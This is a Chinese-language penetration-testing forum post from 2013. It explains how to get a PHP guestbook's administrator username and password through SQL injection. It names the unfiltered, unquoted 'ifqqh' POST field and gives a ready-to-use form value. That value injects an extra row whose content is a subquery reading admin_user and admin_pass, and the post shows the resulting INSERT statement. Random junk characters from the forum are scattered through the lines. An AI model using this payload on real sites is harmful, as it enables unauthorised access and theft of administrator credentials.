中国网络渗透测试联盟

标题: php留言本注入得帐号密码 [打印本页]

作者: admin    时间: 2013-2-19 08:10
标题: php留言本注入得帐号密码
留言本注入。拿到帐号密码。前提知道程序源代码。在insert里面。构造了另外一句SQL。并且把帐号密码读出来。. N% p$ A4 }, u& R0 ~& z
# {8 {( _8 V  j& F
$ifqqh=$_POST["ifqqh"];没有过滤。。。。。。。
9 R' D) I! `/ L$sql=”insert into “.TABLE_PREFIX.”guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘”.$username.”‘,’”.$email.”‘,’”.$content.”‘,’”.$userip.”‘,’”.$systime.”‘,”.$ifshow.”,”.$ifqqh.”)”;$ifqqh没有用 ‘ 来包含。不受magic_quotes_gpc影响; }- c# K& @- w2 z8 D/ Z
% W9 K" K: u& }. m5 y
提交的时候把ifqqh的值改一下。变成1 Z1 C# p0 R* [' ~/ b6 |0 W
; O: @# d# e" {/ J8 A/ E
<input type=”text” id=”ifqqh” name=”ifqqh” value=”1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,1,1,0″ />
9 d; M# A; c; d6 m: r$ Q3 |' q/ i- R) {; a
这样SQL插入语句就变了.2 e; l2 F0 G' f2 L9 q% l
* ]8 a3 \2 y, v" u! m
insert into cf_guestbook(username,email,content,userip,systime,ifshow,ifqqh)values(‘qqq’,”,’msgmsg’,’127.0.0.1′,’2012-12-22 19:07:23′,1,1),(1,1,(SELECT concat(admin_user,0x2f,admin_pass) FROM cf_gbconfig),1,now(),1,0)& P( I4 E# \1 S4 M' x9 o
! r& \* Y* A8 W2 o# [+ e
构造了另外一句SQL。并且把帐号密码读出来。
3 I. L$ D9 m6 G# X) m$ U4 h3 Y( `$ ]1 S





欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2